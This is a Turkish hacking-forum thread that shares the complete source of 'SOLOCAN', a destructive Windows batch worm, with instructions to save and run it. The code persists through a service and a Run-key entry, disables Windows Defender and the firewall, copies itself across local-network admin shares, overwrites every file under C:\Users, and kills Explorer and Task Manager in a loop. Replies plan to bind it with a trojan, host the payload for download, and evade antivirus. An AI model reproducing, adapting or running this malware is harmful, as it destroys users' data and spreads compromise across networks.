S O L O C A N Bat Zarar kodu!//_MaC_

_MaC_ · 24 Haz 2017

Aşağıdaki kodu Not defterine yapıştırın. Uzantısını .bat olarak kaydedin. Örnek: SOLOCAN.bat

Not: Kesinlikle kendi bilgisayarınızda denemeyin. Mesuliyet kabul etmem!

Özellikleri:
[*] Hizmet olarak çalışır.
[*] net kullanımı üzerinden ağdaki tüm bilgisayarları bulaşır.
[*] Ağdaki tüm kullanıcı hesaplarını bulaşır.
[*] C deki tüm dosyalara bulaşır.
[*] Kullanıcılar dosyasını gizler.
[*] Kayıt defterinde başlangıca kendini yazar.
[*] Görev Yöneticisini devre dışı bırakır.
[*] Masaüstünü kapatır.
[*] Windows Defender ve windows güvenlik duvarını kapatır.

Kod:

@echo off
rem <=-=-= Toplu Solucan =-=-=>
rem <=-=-= SOLOCAN  =-=-=>
set i=0
set servicename=SOLOCAN

rem <=== Hizmet Olarak Calis ===>
echo sc create %servicename% binpath=%0 >> service.bat
echo sc start %servicename% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== Baslangic ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== Güvenlik duvari ve Windows Defender'i oldur ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== Ag Bulas!!! ===>
:worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto infect) else (set /a i=i+1)
goto worm
rem <=== infect *.* in C:\Users ===>
:infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
:payload
taskkill /f /im "explorer.exe"
taskkill /f /im "taskmgr.exe"
echo msgbox "SOLOCAN simdi Seni Yakaladi!",1,"%username% wants the D" > solocan.vbs
start solocan.vbs
goto payload

Not:Win7 için, zararlı dosya yönetici modunda çalıştırılmalı.

karayelll · 24 Haz 2017

Eline sağlık

Suleyman37 · 24 Haz 2017

Eline Sağlık

'Gladyo · 24 Haz 2017

Ovvvv O Neymiş Öyle La

Formatla Gider Demi ?
CD Yerini Vee İnterneti Devre Dışı Bırakabilirseniz O Başka O Da Yapılırmı ?
Tüm USB Ve CD Girişlerini Bloke Edebilecek Birşey..

TheHEROZ · 24 Haz 2017

Bu bat dosyasi

Bunu c# ile yapalim

Bat dosyasi nedir:trl

_MaC_ · 25 Haz 2017

Suleyman37' Alıntı:
Eline Sağlık

karayelll' Alıntı:
Eline sağlık

İyi kullanımlar.

_MaC_ · 25 Haz 2017

'Gladyo' Alıntı:
Ovvvv O Neymiş Öyle La Formatla Gider Demi ?
CD Yerini Vee İnterneti Devre Dışı Bırakabilirseniz O Başka O Da Yapılırmı ?
Tüm USB Ve CD Girişlerini Bloke Edebilecek Birşey..

Evet dediğin kodlarda var ama bunlarla zaten bilgisayarı öldürüyoruz. Ama elimde WormBuilder var ama paylaşmak için emin değilim.

_MaC_ · 25 Haz 2017

TheHEROZ' Alıntı:
Bu bat dosyasi
Bunu c# ile yapalim
Bat dosyasi nedir:trl

C# bilmiyorum ama siz biliyorsanız kodları uyarlayabilirsiniz.

'Gladyo · 25 Haz 2017

_MaC_' Alıntı:
Evet dediğin kodlarda var ama bunlarla zaten bilgisayarı öldürüyoruz. Ama elimde WormBuilder var ama paylaşmak için emin değilim.

Worm Builder ? PM İle At Bi..

Sagopa K · 25 Haz 2017

Bunu trojanla binderlamak lazim agdaki pc lere bulasmasi hosuma gitti

_MaC_ · 25 Haz 2017

20071999' Alıntı:
Bunu trojanla binderlamak lazim agdaki pc lere bulasmasi hosuma gitti

Evet olabilir. Bunun üzerinde çalışmalar yapıyorum. İyi sonuç verirse paylaşırım.

Sagopa K · 25 Haz 2017

_MaC_' Alıntı:
Evet olabilir. Bunun üzerinde çalışmalar yapıyorum. İyi sonuç verirse paylaşırım.

Biryandan bende ypayim evdeki pc lerle zararli kodlari silip bakarim bulastigi pc lerde trojani acacakmi diye eger ise yararsa efsane olur

_MaC_ · 25 Haz 2017

20071999' Alıntı:
Biryandan bende ypayim evdeki pc lerle zararli kodlari silip bakarim bulastigi pc lerde trojani acacakmi diye eger ise yararsa efsane olur

Ben şöyle düşünüyorum;
-Trojan(server) yapıp, onu bir siteye yüklemeliyiz.
-SOLOCAN kodlarının başında bilgisayarın güvenliğini devre dışı bıraktırmalıyız.
-Sonra trojanın url'sini çağırmalı ve trojanı indirip çalışmasını sağlamalıyız.
-Ağ ortamındaki bilgisayarlara da yukarıdaki aynı işlemi yapıp.
-Ardından Ağ ortamına yaymak için trojanı ağa yönlendirmeliyiz.
-Geri Artık bizim elimizde.

Sagopa K · 25 Haz 2017

_MaC_' Alıntı:
Ben şöyle düşünüyorum;
-Trojan(server) yapıp, onu bir siteye yüklemeliyiz.
-SOLOCAN kodlarının başında bilgisayarın güvenliğini devre dışı bıraktırmalıyız.
-Sonra trojanın url'sini çağırmalı ve trojanı indirip çalışmasını sağlamalıyız.
-Ağ ortamındaki bilgisayarlara da yukarıdaki aynı işlemi yapıp.
-Ardından Ağ ortamına yaymak için trojanı ağa yönlendirmeliyiz.
-Geri Artık bizim elimizde.

Bence bu zahmetli bir is direk binder denicem ben hem direk .exe yukleyebilecegin hosting var mi bedava ?

_MaC_ · 25 Haz 2017

20071999' Alıntı:
Bence bu zahmetli bir is direk binder denicem ben hem direk .exe yukleyebilecegin hosting var mi bedava ?

Evet Binder ile de olur. Hosting değilde şöyle yeni az kullanılan dosya yükleme sitesi olur.

Sagopa K · 25 Haz 2017

_MaC_' Alıntı:
Evet Binder ile de olur. Hosting değilde şöyle yeni az kullanılan dosya yükleme sitesi olur.

Ama linkin sonunda .html olmaz mi ? .exe olmasi laziim degil mi ?

_MaC_ · 25 Haz 2017

20071999' Alıntı:
Ama linkin sonunda .html olmaz mi ? .exe olmasi laziim degil mi ?

Aynen işte bu sorunu aşmaya çalışıyorum bakalım. Virüs yayanlar bu yöntemi yapıyor. Bi şekilde aşmaya çalışcam, aksi takdirde başka yol deneyeceğim.

AfroTroll · 25 Haz 2017

Qqqqqq

ahmet2356532 · 25 Haz 2017

alınmayın ama işe yaramaz

ağdaki pclere işlemez yani xp güvenlik duvarını bile aşamaz bu meret.

_MaC_ · 25 Haz 2017

ahmet2356532' Alıntı:
alınmayın ama işe yaramaz ağdaki pclere işlemez yani xp güvenlik duvarını bile aşamaz bu meret.

Alınmadım. Deneyebilirsiniz :RpS_biggrin: Fud yapınca kimsenin ruhu bile duymaz. Güvenlik duvarı da neymiş.:RpS_rolleyes:

S O L O C A N Bat Zarar kodu!//_MaC_

Uzman üye

Katılımcı Üye

Uzman üye

Katılımcı Üye

Katılımcı Üye

Uzman üye

Uzman üye

Uzman üye

Katılımcı Üye

Kıdemli Üye

Uzman üye

Kıdemli Üye

Uzman üye

Kıdemli Üye

Uzman üye

Kıdemli Üye

Uzman üye

Üye

Katılımcı Üye

Uzman üye